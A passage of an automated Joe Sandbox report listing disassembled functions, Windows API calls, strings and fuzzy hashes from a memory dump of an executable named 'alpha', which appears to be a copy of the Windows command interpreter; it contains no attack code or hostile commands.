                                                                                      • API String ID: 3358694519-0
                                                                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                      • Instruction ID: 9451ec61dcfcdeb647c9fa3c5b07e23605b9850c5dc86a18ac5aa985a5707b6f
                                                                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                      • Instruction Fuzzy Hash: E3E0C2A2D082538BF5FC3E6160C13B4A99BCB6C7A2FC44032C60F252C0892D28415228
                                                                                      Function 00007FF793752E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
                                                                                      • API String ID: 2221118986-0
                                                                                      • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                      • Instruction ID: e034a9504fcadbb17c3f25d3a1770b9051185321dd3d258ecbbfe922386569e7
                                                                                      • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                      • Instruction Fuzzy Hash: 8BF0E921B0978240EEA49B66B58516992959F4CBF0F888335EF7D57BC5DE3CD4528300

                                                                                      Non-executed Functions

                                                                                      Function 00007FF793745B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                      • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                      • API String ID: 1388555566-2647954630
                                                                                      • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                      • Instruction ID: 272d67c973ab5df304d4d5e31cdeefb8107f3f331b9eb94a4a887afe2ca658ba
                                                                                      • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                      • Instruction Fuzzy Hash: 94A2D431A08B8286FBB4AB35A4941B9F7A9FB8D745F808135DA0E67795DF3CE504C720
                                                                                      Function 00007FF79374E680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                      • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                      • API String ID: 511550188-726566285
                                                                                      • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                      • Instruction ID: 7cfa29112ad3345ce6131440e194d8e25ba5bb20fe3b843fdc201657bd723c2a
                                                                                      • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                      • Instruction Fuzzy Hash: 4952D132B0865286FBB4AB34A484279EAEAFB4D751FC44135D94E63B94DF3CE940C760
                                                                                      Function 00007FF793749E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp$wcschr$wcstol
                                                                                      • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                      • API String ID: 1738779099-3004636944
                                                                                      • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                      • Instruction ID: 31abb6c6c5723008903d05d1615eb92d6b1a54d56406bd8a7cec18856495bc64
                                                                                      • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                      • Instruction Fuzzy Hash: 37726E32B0865286F7F0AB7594C46BDB7BABB48748F818035DE0E67794DE3CA815C361
                                                                                      Function 00007FF793767F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793767F44
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793767F5C
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793767F9E
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793767FFF
                                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768020
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768036
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768061
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793768075
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937680D6
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF7937680EA
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF793768177
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF79376819A
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF7937681BD
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF7937681DC
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF7937681FB
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF79376821A
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF793768239
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768291
                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937682D7
                                                                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937682FB
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF79376831A
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768364
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF793768378
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF79376839A
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937683AE
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7937683E6
                                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768403
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF793768418
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                      • API String ID: 3637805771-3100821235
                                                                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                      • Instruction ID: 1ba39f55f7bcec6094a4b8f97d53840fd9384bd1e6a9fc3211549fafaa4b8751
                                                                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                      • Instruction Fuzzy Hash: 61E19631A04A52DAF7A0AF35E490179F6A9FB4DB99B848234CD1F63790DF3CA905C721
                                                                                      Function 00007FF793743F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                      • String ID: %s$%s
                                                                                      • API String ID: 3623545644-3518022669
                                                                                      • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                      • Instruction ID: ac08597a9c54399f2925a9cd23fc6cdf852e9f5b6a2316b453e1c819fc97aa4b
                                                                                      • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                                                                      • Instruction Fuzzy Hash: 68D2B431A086828AFBF4AB3594D42BDB7A9FB48758F904135DA0E67B95DF3CE404C711
                                                                                      Function 00007FF793742C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                      • String ID: %9d$%s
                                                                                      • API String ID: 4286035211-3662383364
                                                                                      • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                      • Instruction ID: f120436d043271a51e2ef023bf11f40e8e919471000b571f205104a79d67a217
                                                                                      • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                      • Instruction Fuzzy Hash: 4152B732A08B828AFBB4AB34D8942F9B7A9FB4D749F804135DA0E57794DF3CE5458710
                                                                                      Function 00007FF7937518D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcsrchr$towlower
                                                                                      • String ID: fdpnxsatz
                                                                                      • API String ID: 3267374428-1106894203
                                                                                      • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                      • Instruction ID: eead57a7056066771a47ef280311f3ecdd1b8fe242ca2862212c130df97d6890
                                                                                      • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                      • Instruction Fuzzy Hash: 9442D122B0868285FFB8AF3594942B9A7A9FF49B95F844136DE0E277C4DF3CE4418310
                                                                                      Function 00007FF793747650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                      • String ID: DPATH
                                                                                      • API String ID: 95024817-2010427443
                                                                                      • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                      • Instruction ID: 69c5410513cdd84b1b0d82d47f2a7c51d9b56d582523f953fabbb649949b1d22
                                                                                      • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                      • Instruction Fuzzy Hash: AD12D932A08A8286E7B4AF35A49017EF7A9FB8D754F845139DA5E63794DF3CE400CB11
                                                                                      Function 00007FF793745240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                                                      • API String ID: 0-1980097535
                                                                                      • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                      • Instruction ID: 32939a931d645d408289e3459cfb5f167e87ea1ffd00ab3005993394c5ce36fd
                                                                                      • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                      • Instruction Fuzzy Hash: 2D32AD72A08A8286FBB0EF31D4942F9A3A9EB4D788F814135DA0D67795DF3CE505C721
                                                                                      Function 00007FF793746EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                      • API String ID: 1795611712-3662956551
                                                                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                      • Instruction ID: db262f3625d67f43cb20ef05c3c84e330d6d1a973b02728c9524b71be3bc1636
                                                                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                      • Instruction Fuzzy Hash: 56E1D421A0864296FBB0AB75A8D41B9E7AAFF4C788FD44132D90E77694DF3CE504C760
                                                                                      Function 00007FF79376EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcsupr.MSVCRT ref: 00007FF79376EF33
                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376EF98
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376EFA9
                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376EFBF
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF79376EFDC
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376EFED
                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F003
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F022
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F083
                                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F092
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F0A5
                                                                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF79376F0DB
                                                                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F135
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F16C
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F185
                                                                                        • Part of subcall function 00007FF7937501B8: _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                        • Part of subcall function 00007FF7937501B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
